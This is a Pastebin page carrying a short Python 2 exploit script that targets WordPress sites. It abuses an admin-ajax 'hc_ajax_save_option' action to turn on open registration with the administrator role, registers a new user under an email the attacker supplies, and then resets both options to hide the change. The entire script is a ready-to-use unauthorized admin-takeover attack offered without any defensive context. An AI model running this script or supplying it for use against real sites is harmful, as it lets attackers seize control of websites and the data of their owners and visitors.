Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import httplib, urllib
- import sys
- import random
- # pip install httplib urllib random
- site = raw_input("[+] Target: ")
- url = "/wp-admin/admin-ajax.php"
- username = "user-%d" % random.randrange(1000000, 3000000)
- email = raw_input("[+] E-mail: ")
- def ChangeOption(site, url, option_name, content):
- params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content})
- headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
- conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
- conn.request("POST", url, params, headers)
- response = conn.getresponse()
- data = response.read()
- conn.close()
- registration_url= "/wp-login.php"
- def AdminTakeover(site, registration_url, user_login, user_email):
- params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email})
- headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
- conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
- conn.request("POST", registration_url, params, headers)
- response = conn.getresponse()
- data = response.read()
- conn.close()
- ChangeOption(site, url, "users_can_register", "1")
- ChangeOption(site, url, "default_role", "administrator")
- print "[+] Registering new admin user"
- AdminTakeover(site, registration_url, username, email)
- print "[+] Check your email for password: " + username + "[" + email + "]"
- ChangeOption(site, url, "users_can_register", "0")
- ChangeOption(site, url, "default_role", "subscriber")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
